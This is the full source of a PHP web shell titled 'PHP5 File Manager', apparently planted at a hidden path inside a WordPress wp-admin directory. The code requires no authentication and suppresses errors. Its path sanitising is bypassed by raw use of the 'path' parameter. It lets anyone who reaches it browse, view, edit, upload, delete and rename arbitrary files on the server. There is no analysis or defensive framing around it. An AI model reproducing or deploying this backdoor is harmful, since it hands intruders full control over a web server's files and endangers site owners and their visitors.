File "index.php"
Full Path: /home/hmstorb/www/wp-admin+12/js/widgets/.tmb/index.php
File size: 13.52 KB
MIME-type: text/x-php
Charset: utf-8
<?php
/**
* Mini File Manager
*
* WARNING: This provides full file access. Secure it before using in production.
*/
// ========================
// FUNCTIONS
// ========================
error_reporting(0);
function sanitize_path($path) {
return str_replace(array('../', './'), '', $path);
}
function format_size($bytes) {
if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
return $bytes . ' bytes';
}
function get_file_icon($file) {
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$icons = array(
'pdf' => '📄',
'doc' => '📄', 'docx' => '📄',
'xls' => '📊', 'xlsx' => '📊',
'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️',
'php' => '🐘', 'html' => '🌐', 'htm' => '🌐',
'zip' => '🗜️', 'rar' => '🗜️', 'tar' => '🗜️', 'gz' => '🗜️',
'mp3' => '🎵', 'wav' => '🎵',
'mp4' => '🎬', 'avi' => '🎬', 'mov' => '🎬'
);
return isset($icons[$ext]) ? $icons[$ext] : '📝';
}
// ========================
// MAIN CODE
// ========================
$action = isset($_GET['act']) ? $_GET['act'] : 'list';
$path = isset($_GET['path']) ? $_GET['path'] : '';
$path = sanitize_path($path);
// Set full path
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
$files = scandir($path);
$files = array_diff($files, array('.', '..'));
// Handle actions
switch ($action) {
case 'download':
$file = isset($_GET['file']) ? $_GET['file'] : '';
$file = sanitize_path($file);
$file_path = $path . '/' . $file;
if (file_exists($file_path) && is_file($file_path)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file_path));
readfile($file_path);
exit;
}
break;
case 'view':
$file = isset($_GET['file']) ? $_GET['file'] : '';
$file = sanitize_path($file);
$file_path = $path . '/' . $file;
if (file_exists($file_path) && is_file($file_path)) {
$ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
$content = file_get_contents($file_path);
}
break;
case 'edit':
$file = isset($_GET['file']) ? $_GET['file'] : '';
$file = sanitize_path($file);
$file_path = $path . '/' . $file;
if (isset($_POST['content'])) {
file_put_contents($file_path, $_POST['content']);
header('Location: ?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=' . urlencode($path));
exit;
}
if (file_exists($file_path) && is_file($file_path)) {
$ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
$content = file_get_contents($file_path);
}
break;
case 'delete':
$target = isset($_GET['target']) ? $_GET['target'] : '';
$target = sanitize_path($target);
$target_path = $path . '/' . $target;
if (file_exists($target_path)) {
if (is_file($target_path)) {
unlink($target_path);
} elseif (is_dir($target_path)) {
rmdir($target_path);
}
}
header('Location: ?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=' . urlencode($path));
exit;
case 'upload':
if (isset($_FILES['file']['name']) && $_FILES['file']['name']) {
if(!@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
echo '<font color="green">File Upload Done.</font><br />';
}else{
echo '<font color="red">File Upload Error.</font><br />';
}
}
break;
case 'mkdir':
if (isset($_POST['dirname']) && $_POST['dirname']) {
$new_dir = $path . '/' . sanitize_path($_POST['dirname']);
mkdir($new_dir);
header('Location: ?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=' . urlencode($path));
exit;
}
break;
case 'rename':
if (isset($_POST['oldname']) && $_POST['oldname'] && isset($_POST['newname']) && $_POST['newname']) {
$old_path = $path . '/' . sanitize_path($_POST['oldname']);
$new_path = $path . '/' . sanitize_path($_POST['newname']);
rename($old_path, $new_path);
header('Location: ?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=' . urlencode($path));
exit;
}
break;
}
// List files by default
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PHP5 File Manager</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }
.container { background: white; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
table { width: 100%; border-collapse: collapse; margin-top: 20px; }
th, td { padding: 10px; border-bottom: 1px solid #ddd; text-align: left; }
th { background: #f0f0f0; }
.breadcrumb { margin-bottom: 20px; }
.breadcrumb a { color: #06c; text-decoration: none; }
.action-buttons { margin-bottom: 20px; }
.btn { padding: 5px 10px; background: #06c; color: white; text-decoration: none; border-radius: 3px; font-size: 14px; }
.btn-danger { background: #c00; }
textarea { width: 100%; height: 400px; font-family: monospace; }
.file-icon { margin-right: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>PHP5 File Manager</h1>
<div class="breadcrumb">
<p><?php if(function_exists('getcwd')){
echo getcwd();
} ?></p>
<?php
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
?><br>[ <a href="?">Home</a> ]
</div>
<div class="action-buttons">
<a href="#" onclick="document.getElementById('upload-form').style.display='block'; return false;" class="btn">Upload File</a>
<a href="#" onclick="document.getElementById('mkdir-form').style.display='block'; return false;" class="btn">Create Folder</a>
</div>
<div id="upload-form" style="display:none; margin-bottom: 20px; padding: 15px; background: #f9f9f9; border-radius: 3px;">
<form action="?act=upload&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" method="post" enctype="multipart/form-data">
<input type="file" name="file" required>
<button type="submit" class="btn">Upload</button>
<button type="button" class="btn" onclick="document.getElementById('upload-form').style.display='none'">Cancel</button>
</form>
</div>
<div id="mkdir-form" style="display:none; margin-bottom: 20px; padding: 15px; background: #f9f9f9; border-radius: 3px;">
<form action="?act=mkdir&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" method="post">
<input type="text" name="dirname" placeholder="Folder name" required>
<button type="submit" class="btn">Create</button>
<button type="button" class="btn" onclick="document.getElementById('mkdir-form').style.display='none'">Cancel</button>
</form>
</div>
<?php if ($action == 'view' || $action == 'edit'): ?>
<h2><?php echo $action == 'edit' ? 'Editing' : 'Viewing'; ?>: <?php echo htmlspecialchars($file); ?></h2>
<?php if ($action == 'edit'): ?>
<form action="?act=edit&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" method="post">
<textarea name="content"><?php echo htmlspecialchars($content); ?></textarea>
<div style="margin-top: 10px;">
<button type="submit" class="btn">Save</button>
<a href="?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" class="btn">Cancel</a>
</div>
</form>
<?php else: ?>
<pre><?php echo htmlspecialchars($content); ?></pre>
<div style="margin-top: 10px;">
<a href="?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" class="btn">Back</a>
</div>
<?php endif; ?>
<?php else: ?>
<?php if($action == 'rename'): ?>
<div id="rename-form">
<form action="?act=rename&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?= urlencode($path) ?>" method="post">
<input type="hidden" name="oldname" value="<?=$_GET['target']; ?>">
<input type="text" name="newname" value="<?=$_GET['target']; ?>" required>
<button type="submit" class="btn">Rename</button>
</form>
</div>
<?php endif; ?>
<table>
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($files as $file): ?>
<?php
$file_path = $path . '/' . $file;
$is_dir = is_dir($file_path);
$size = $is_dir ? '-' : format_size(filesize($file_path));
$modified = date('Y-m-d H:i:s', filemtime($file_path));
?>
<tr>
<td>
<span class="file-icon"><?php echo $is_dir ? '📁' : get_file_icon($file); ?></span>
<?php if ($is_dir): ?>
<a href="?action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path . '/' . $file); ?>"><?php echo htmlspecialchars($file); ?></a>
<?php else: ?>
<a href="?act=view&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>"><?php echo htmlspecialchars($file); ?></a>
<?php endif; ?>
</td>
<td><?php echo $size; ?></td>
<td><?php echo $modified; ?></td>
<td>
<?php if (!$is_dir): ?>
<a href="?act=download&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" class="btn">Download</a>
<?php
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
?>
<a href="?act=edit&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" class="btn">Edit</a>
<?php endif; ?>
<a href="?act=delete&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&target=<?php echo urlencode($file); ?>" class="btn btn-danger" onclick="return confirm('Are you sure?')">Delete</a>
<a href="?act=rename&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&target=<?php echo urlencode($file); ?>" class="btn">Rename</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>